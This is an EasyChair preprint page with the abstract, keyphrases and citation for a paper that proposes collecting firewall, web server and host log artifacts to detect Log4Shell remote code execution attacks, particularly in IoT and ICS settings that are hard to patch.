Framework for Analyzing Heterogeneous Log Internal Artifacts for Remote Code Execution Detection

EasyChair Preprint 15590

Abstract

The Log4Shell vulnerability, first identified in 2021, has significantly impacted global cybersecurity, ranking among the most critical vulnerabilities ever documented. In response to this threat, patches were swiftly developed and deployed. However, in environments where the implementation of firmware patches presents challenges—such as within the Internet of Things (IoT) and Industrial Control Systems (ICS)—systems remain susceptible to Log4Shell. Consequently, in addition to addressing the root cause of the issue through patches, there is an urgent need for methodologies that can detect and proactively respond to such attacks in their early stages. This study proposes a methodology for the collection of artifacts derived from heterogeneous logs generated by firewalls, web servers, and host devices, and delineates a strategy for the detection of Log4Shell attacks utilizing these artifacts throughout the progression of such attacks. Future research will include an experimental demonstration of the proposed detection schemes, categorizing the artifacts that can be collected according to the various stages of the attack.

Keyphrases: Log4Shell, log analysis, remote code execution

@booklet{EasyChair:15590,
  author    = {Seung-Ju Han and Ka-Kyung Kim and Hye-Ji Lee and Ieck-Chae Euom},
  title     = {Framework for Analyzing Heterogeneous Log Internal Artifacts for Remote Code Execution Detection},
  howpublished = {EasyChair Preprint 15590},
  year      = {EasyChair, 2024}}